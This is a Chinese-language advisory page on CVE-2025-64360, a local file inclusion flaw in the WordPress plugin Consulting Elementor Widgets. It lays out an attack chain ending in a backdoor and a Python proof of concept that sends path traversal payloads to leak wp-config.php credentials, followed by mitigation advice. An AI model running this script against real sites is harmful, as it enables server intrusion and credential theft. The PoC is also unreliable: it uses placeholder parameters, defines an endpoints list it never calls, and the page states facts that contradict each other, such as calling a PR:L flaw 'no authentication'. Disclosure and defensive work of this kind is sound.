CVE-2025-64360 Consulting Elementor Widgets 本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-64360

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Consulting Elementor Widgets (StylemixThemes)

漏洞概述

CVE-2025-64360是WordPress插件Consulting Elementor Widgets中的一个高危安全漏洞，CVSS评分7.5，属于高危级别。该漏洞为PHP本地文件包含(Local File Inclusion, LFI)漏洞，存在于插件的文件包含逻辑中，攻击者可以利用该漏洞包含服务器上的任意本地文件，包括敏感的配置文件、PHP代码文件等。攻击者通过构造恶意请求，操控文件包含路径，可能实现远程代码执行(RCE)，从而完全控制受影响的Web服务器。该漏洞由Patchstack团队的[email protected]发现并报告，披露日期为2025年10月31日。由于该插件广泛用于企业咨询类网站，漏洞可能影响大量使用该插件的WordPress站点。

技术细节

该漏洞存在于Consulting Elementor Widgets插件的PHP文件包含逻辑中。插件在处理某些Elementor小工具时，直接使用用户可控的输入参数作为include/require语句的文件路径，而未进行充分的输入验证和路径安全检查。攻击者可以通过构造包含路径遍历序列(如../../)的请求，绕过目录限制，包含服务器上的任意PHP文件。例如，攻击者可尝试包含wp-config.php获取数据库凭证，或包含日志文件实现代码执行。由于PHP的include语句会执行目标文件中的PHP代码，攻击者可以通过包含预先上传的恶意PHP文件或利用服务器日志来实现远程代码执行。漏洞的CVSS向量显示攻击复杂度为高(AC:H)，但由于无需认证(PR:L)且可通过网络利用(AV:N)，实际利用仍具有较高威胁。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别运行Consulting Elementor Widgets插件的WordPress站点，通过版本检测确认插件版本<=1.4.2

STEP 2

步骤2

漏洞探测：攻击者分析插件的Elementor小工具接口，定位存在文件包含逻辑的端点

STEP 3

步骤3

构造恶意请求：攻击者构造包含路径遍历序列(../../)的HTTP请求，尝试包含敏感文件如wp-config.php

STEP 4

步骤4

信息泄露利用：通过LFI获取数据库凭证、API密钥等敏感配置信息

STEP 5

步骤5

远程代码执行：攻击者上传恶意PHP文件或利用日志文件注入，通过LFI包含该文件执行任意代码

STEP 6

步骤6

持久化控制：建立后门，维持对服务器的持久访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64360 PoC - Consulting Elementor Widgets Local File Inclusion
# Target: WordPress site with Consulting Elementor Widgets plugin <= 1.4.2

def exploit_lfi(target_url, file_path='wp-config.php'):
    """
    Exploit LFI vulnerability in Consulting Elementor Widgets plugin
    @param target_url: Base URL of the WordPress site
    @param file_path: Path to the file to include (default: wp-config.php)
    """
    
    # Try to exploit via Elementor widget parameter
    # Adjust the endpoint based on actual vulnerable widget
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-content/plugins/consulting-elementor-widgets/inc/widgets/*.php'
    ]
    
    # LFI payload with path traversal
    payload = '../../../' * 3 + file_path + '%00'
    
    params = {
        'action': 'consulting_elementor_widget_action',
        'widget': 'vulnerable_widget',
        'file': payload
    }
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Attempting to include: {file_path}')
    print(f'[*] Payload: {payload}')
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f'[+] Response Status: {response.status_code}')
        
        if 'DB_NAME' in response.text or '<?php' in response.text:
            print('[!] File inclusion successful - wp-config.php leaked')
            return True
        else:
            print('[-] File inclusion failed or file not readable')
            return False
            
    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url> [file_path]')
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2] if len(sys.argv) > 2 else 'wp-config.php'
    exploit_lfi(target, file_path)

影响范围

Consulting Elementor Widgets <= 1.4.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 暂时禁用Consulting Elementor Widgets插件；2) 通过WAF规则阻止包含../或%00的请求参数；3) 修改wp-config.php权限为440或400，防止通过LFI读取；4) 限制PHP的allow_url_include为Off；5) 启用Web服务器的访问日志监控，及时发现异常请求模式。建议优先升级到插件最新版本以彻底修复该漏洞。